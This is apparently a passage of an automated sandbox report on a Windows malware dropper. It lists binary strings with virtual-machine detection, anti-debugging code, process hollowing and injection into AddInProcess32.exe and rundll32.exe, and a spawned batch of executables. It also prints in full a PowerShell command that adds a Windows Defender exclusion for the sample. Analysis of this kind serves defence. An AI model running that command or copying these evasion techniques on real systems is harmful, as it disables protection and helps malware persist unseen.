                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: eUnprocessable EntityWinmonProcessMonitor\\.\pipe\VBoxTrayIPC^.*\._Ctype_uint8_t$asn1: syntax error: assigned stream ID 0bad font file formatbad system page sizebad use of bucket.bpbad use of bucket.mpcertificate requiredchan send (nil chan)close of nil channe
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: rdtscpreadatreasonremoverenamereturnrun-v3rune1 secondselectsendtoserversocketsocks socks5statusstringstructsweep sysmontelnettimersuint16uint32uint64unuseduptimevmhgfsvmxnetvpc-s3wup_hsxennetxensvcxenvdb %v=%v, (conn) (scan (scan) MB in Value> allocs dying=
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: potency-Key\System32\drivers\\.\VBoxMiniRdrDN os/exec.Command(^.*\._Ctype_char$bad TinySizeClasscouldn't dial: %wcouldn't find pidcouldn't get UUIDcouldn't get pidscouldn't hide PIDcpu name is emptycreate window: %wdecode server: %wdecryption faileddownload fi
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: releasep: m=remote errorremoving appruntime: gp=runtime: sp=s ap traffics hs trafficself-preemptsetupapi.dllshort bufferspanSetSpinesweepWaiterstraceStringstraffic/readtransmitfileulrichard.chunexpected )unknown portunknown typevmacthlp.exevmtoolsd.exewatchdog
                  Source: AddInProcess32.exe, 00000005.00000002.4471946654.0000000001210000.00000004.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3179241086.0000000000ECE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, 00000010.00000002.3275239614.0000000001202000.00000040.00000020.00020000.00000000.sdmp, sUyDoVTGsfEnMY0oeyexTBut.exe, 00000011.00000002.3187282898.0000000001170000.00000040.00000020.00020000.00000000.sdmp, VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3269213397.0000000001022000.00000040.00000020.00020000.00000000.sdmp, MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3245748971.000000000110C000.00000040.00000020.00020000.00000000.sdmp, LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: \\.\HGFS`
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: lUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dll
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: MathPOSTALCODEParseAddr(ParseFloatPhoenicianProcessingPulseEventRIPEMD-160RST_STREAMResetEventSHA256-RSASHA384-RSASHA512-RSASYSTEMROOTSaurashtraSecureBootSet-CookieShowWindowTor uptimeUser-AgentVMSrvc.exeWSACleanupWSASocketWWSAStartupWget/1.9.1Windows 10Window
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: PalmyreneParseUintPatchTimePublisherReleaseDCRemoveAllSTUN addrSamaritanSee OtherSeptemberSundaneseSysnativeToo EarlyTrailer: TypeCNAMETypeHINFOTypeMINFOUse ProxyVBoxGuestVBoxMouseVBoxVideoWSASendToWednesdayWindows 7WriteFileZ07:00:00[%v = %d][:^word:][:alnum:
                  Source: LP2uR8v5nKtflOO7HsEX74Am.exe, 00000019.00000002.3195890952.00000000010DF000.00000040.00000020.00020000.00000000.sdmpBinary or memory string: vmhgfsP
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: Not ImplementedNtSuspendThreadOpenThreadTokenOther_LowercaseOther_UppercasePKCS1WithSHA256PKCS1WithSHA384PKCS1WithSHA512Partial ContentPostQuitMessageProcess32FirstWPsalter_PahlaviQueryDosDeviceWRegCreateKeyExWRegDeleteValueWRequest TimeoutRtlDefaultNpAclSafeArrayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\DefaultX-Forwarded-For\\.\VBoxTrayIPC]
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exe, 00000012.00000002.3241666787.0000000000D7E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllr
                  Source: CGZL5y3D81OCbb2NABnHZhPM.exe, 0000000C.00000002.2361261570.00000000004BE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW_Q%SystemRoot%\system32\mswsock.dlll
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VirtualUnlockWINDOW_UPDATEWTSFreeMemoryWriteConsoleW[FrameHeader \\.\VBoxGuestaccept-rangesaccess deniedadvapi32.dllauthorizationbad flushGen bad map statebtc.cihar.combtc.xskyx.netcache-controlcontent-rangecouldn't polldalTLDpSugct?data is emptydouble unlockemail addressempty integerexchange fullfatal error: gethostbynamegetservbynamegzip, deflateif-none-matchignoring fileimage/svg+xmlinvalid ASN.1invalid UTF-8invalid base kernel32.dllkey expansionlame referrallast-modifiedlevel 3 resetload64 failedmaster secretmin too largename is emptynil stackbasenot a Float32open file: %wout of memoryparallels: %wparsing time powrprof.dllprl_tools.exeprofMemActiveprofMemFutureread EULA: %wrebooting nowruntime: seq=runtime: val=service stateset event: %wsigner is nilsocks connectsrmount errortimer expiredtraceStackTabtrailing dataunimplementedunsupported: user canceledvalue method virtualpc: %wxadd64 failedxchg64 failed}
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: unixpacketunknown pcuser-agentuser32.dllvmusbmousevmware: %wws2_32.dll of size (targetpc= , plugin: ErrCode=%v KiB work, bytes ...
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: bmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: ssse3sudogsweeptext/tls: torrctotaltraceuint8unameusageuser=utf-8valuevmusbvmx86write B -> Value addr= alloc base code= ctxt: curg= free goid jobs= list= m->p= max= min= next= p->m= prev= span=% util%s.exe%s.sys%s: %s(...) , i = , not , val -BEFV--DYOR--
                  Source: VT4T5BrKWgz9d48cmEd8ePkZ.exe, sUyDoVTGsfEnMY0oeyexTBut.exe, VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: ultX-Forwarded-For\\.\VBoxTrayIPC] morebuf={pc:accept-encodingaccept-languageadvertise erroragent is closedapplication/pdfasyncpreemptoffbad certificatebad trailer keybefore EfiGuardclass registredclient finishedcouldn't set AVcouldn't set sbdecode hash: %wdo
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: VersionVirtualWSARecvWSASend"%s" %stypes value=abortedalt -> answersany -> booleancharsetchunkedcmd.execonnectconsolecpu: %scpuprofderiveddriversexpiresfloat32float64forcegcgctracehead = http://invalidlog.txtlookup messageminpc= nil keynop -> number pacer: panic: readdirrefererrefreshrequestrunningserial:server=signal svc_versyscalltor.exetraileruintptrunknownupgradeversionvmmousevpcuhubwaitingwindowswsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAcceptedAllocateAltitudeArmenianBAD RANKBalineseBopomofoBugineseCancelIoCherokeeClassANYConflictContinueCurveID(CyrillicDNS nameDSA-SHA1DecemberDefenderDeleteDCDuployanEULA.txtEqualSidEthiopicExtenderFebruaryFirewallFullPathGeorgianGetOEMCPGoStringGujaratiGurmukhiHTTP/1.1HTTP/2.0HiraganaInstFailInstRuneIsWindowJavaneseKatakanaKayah_LiLIFETIMELinear_ALinear_BLocationLsaCloseMD5+SHA1MahajaniNO_ERRORNO_PROXYNovemberOl_ChikiPRIORITYPROGRESSParseIntPersoconPhags_PaQuestionReadFileReceivedSETTINGSSHA1-RSASHA3-224SHA3-256SHA3-384SHA3-512SOFTWARESaturdaySetEventSystem32TagbanwaTai_ThamTai_VietThursdayTifinaghTypeAAAATypeAXFRUSERHASHUSERNAMEUgariticVBoxWddmWSAIoctlWinmonFSWmiPrvSE[::1]:53[:word:][signal \\.\HGFS\\.\vmcistack=[_NewEnum_gatewayacceptexaddress bad instcgocheckcontinuecs deadlockdefault:dial: %wdnsquerydurationeax ebp ebx ecx edi edx eflags eip embeddedesi esp execwaitexporterf is nilfinishedfs gs hijackedhttp/1.1https://if-matchif-rangeinfinityinjectorinvalid linkpathlocationmac_addrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.) B work ( blocked= in use)
                  Source: MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe, 00000014.00000002.3275782158.0000000002CB0000.00000040.00001000.00020000.00000000.sdmpBinary or memory string: m=] = ] n=allgallparchasn1avx2basebindbitsbmi1bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (at ...
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: bmi2boolcallcap cas1cas2cas3cas4cas5cas6chandatedeaddialdoneermsetagethmfailfileflagfromftpsfuncgziphosthourhttpicmpidleigmpint8itabjsonkindlinkmdnsnullopenpathpipepop3quitreadrootsbrkseeksid=sizesmtpsse3tag:tcp4texttruetypeudp4uintunixuuidvaryvmcixn-- -%s (a
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: swsarecvwsasendwup_verxen: %wxennet6 bytes, data=%q etypes incr=%v is not maxpc= mcount= minLC= minutes nalloc= newval= nfreed= ping=%q pointer stack=[ status %!Month(%02d%02d%s %s:%d%s: 0x%x-cleanup2.5.4.102.5.4.112.5.4.1748828125?4#?'1#0AcceptExAccepted
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: too many linkstoo many userstorrc filenameunexpected EOFunknown code: unknown error unknown methodunknown mode: unreachable: unsafe.PointeruserArenaStatevirtualbox: %wvmwaretray.exevmwareuser.exewii libnup/1.0winapi error #window createdwork.full != 0xenservi
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: ddrmountvolmsvmmoufno anodeno-cacheno_proxypollDescreadfromrecvfromreflect.runnableruntime.rwmutexRrwmutexWscavengeshutdownstrconv.taskkilltor_modetraceBuftrigger=unixgramunknown(usernamevmmemctlvmx_svgawalk: %wwsaioctlwuauservx509sha1yuio.top (forced) B exp.)
                  Source: VvPx7JMqkEvTJAQ2rPS2y2wf.exeBinary or memory string: rayCreateSafeArrayGetDimSafeArrayGetIIDSafeArrayUnlockScheduledUpdateSetCommTimeoutsSetSecurityInfoSetVolumeLabelWShellExecuteExWStringFromCLSIDStringFromGUID2TerminateThreadUnescaped quoteUninstallStringUnmapViewOfFileVBoxService.exeVPS.hsmiths.comWinsta0\Def
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeAPI call chain: ExitProcess graph end nodegraph_12-7506
                  Source: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exeAPI call chain: ExitProcess graph end nodegraph_14-6894
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeAPI call chain: ExitProcess graph end node
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00402E47 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00402E47
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040AF7C LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,12_2_0040AF7C
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00415DC0 mov eax, dword ptr fs:[00000030h]15_2_00415DC0
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00906027 mov eax, dword ptr fs:[00000030h]15_2_00906027
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F0D90 mov eax, dword ptr fs:[00000030h]15_2_008F0D90
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_008F092B mov eax, dword ptr fs:[00000030h]15_2_008F092B
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00942E03 push dword ptr fs:[00000030h]15_2_00942E03
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeCode function: 16_2_012020A3 push dword ptr fs:[00000030h]16_2_012020A3
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeCode function: 17_2_011700A3 push dword ptr fs:[00000030h]17_2_011700A3
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeCode function: 18_2_010220A3 push dword ptr fs:[00000030h]18_2_010220A3
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004031E9 GetStartupInfoA,GetProcessHeap,GetProcessHeap,HeapAlloc,_fast_error_exit,GetVersionExA,GetProcessHeap,HeapFree,GetProcessHeap,HeapFree,_fast_error_exit,_fast_error_exit,__RTC_Initialize,__ioinit,__amsg_exit,GetCommandLineA,___crtGetEnvironmentStringsA,__setargv,__amsg_exit,__setenvp,__amsg_exit,__cinit,__amsg_exit,__wincmdln,12_2_004031E9
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\PM6qM9TthMxsL1RAWEhuUNLx.exeProcess token adjusted: Debug
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040B9B5 __NMSG_WRITE,_raise,_memset,SetUnhandledExceptionFilter,UnhandledExceptionFilter,RtlUnwind,12_2_0040B9B5
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_00402E47 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_00402E47
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040834B SetUnhandledExceptionFilter,__encode_pointer,12_2_0040834B
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_0040836D __decode_pointer,SetUnhandledExceptionFilter,12_2_0040836D
                  Source: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exeCode function: 12_2_004027AB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,12_2_004027AB
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00419DC7 SetUnhandledExceptionFilter,15_2_00419DC7
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00417B4E
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_004173DD
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_0090A02E SetUnhandledExceptionFilter,15_2_0090A02E
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00907DB5 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,15_2_00907DB5
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00907644 memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,15_2_00907644
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory allocated: page read and write | page guardJump to behavior

                  HIPS / PFW / Operating System Protection Evasion

                  barindex
                  Adds a directory exclusion to Windows Defender
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -Force
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -ForceJump to behavior
                  Injects a PE file into a foreign processes
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000 value starts with: 4D5AJump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5A
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000 value starts with: 4D5A
                  Sample uses process hollowing technique
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeSection unmapped: unknown base address: 400000Jump to behavior
                  Searches for specific processes (likely to inject)
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00415D00 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,15_2_00415D00
                  Source: C:\Users\user\AppData\Local\Temp\syncUpd.exeCode function: 15_2_00905F67 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,15_2_00905F67
                  Writes to foreign memory regions
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 400000Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 402000Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 404000Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: 406000Jump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe base: EB6008Jump to behavior
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 401000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 405000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 406000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 2E4D008
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 400000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 401000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 405000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 406000
                  Source: C:\Users\user\AppData\Local\Temp\wfplwfs.exeMemory written: C:\Windows\SysWOW64\rundll32.exe base: 30E5008
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dl7WL77rkA.exe" -ForceJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                  Source: C:\Users\user\Desktop\dl7WL77rkA.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe "C:\Users\user\Pictures\CGZL5y3D81OCbb2NABnHZhPM.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe "C:\Users\user\Pictures\kDgMkoNM3lKxwY8D8wOiP15F.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe "C:\Users\user\Pictures\3BiVM2uOsvGVXA1BoDorVuCU.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe "C:\Users\user\Pictures\VT4T5BrKWgz9d48cmEd8ePkZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe "C:\Users\user\Pictures\sUyDoVTGsfEnMY0oeyexTBut.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe "C:\Users\user\Pictures\VvPx7JMqkEvTJAQ2rPS2y2wf.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe "C:\Users\user\Pictures\BTnjKpTBDzKtQo69b5SrwYDx.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe "C:\Users\user\Pictures\MVwPLcOCrd7Zgqh1ZdkGUuVZ.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe "C:\Users\user\Pictures\nxFajWDYSB3pQQxmrqt3pD1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe "C:\Users\user\Pictures\yq7sRYx0zxf2nUHNI8myIvQb.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe "C:\Users\user\Pictures\yzAPe25HGnxqbkafYprXvqQ2.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe "C:\Users\user\Pictures\LP2uR8v5nKtflOO7HsEX74Am.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe "C:\Users\user\Pictures\65bl5N8ldxUdfHpwZdasCC1T.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe "C:\Users\user\Pictures\LEGkdjk2eFexBjdd51KvbC5Q.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe "C:\Users\user\Pictures\BitVM4h79HXjwHpz9WBgoxJI.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe "C:\Users\user\Pictures\YfSmDepXBWKsGmamEEWNYwB5.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe "C:\Users\user\Pictures\RC2DCMOzLtOY3PfjMU0omeEi.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe "C:\Users\user\Pictures\pxzTG78L668f3mDyeDkHXryr.exe"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeProcess created: C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe "C:\Users\user\Pictures\MK1r6sTJJ0KuvAGWdjimbW8H.exe"
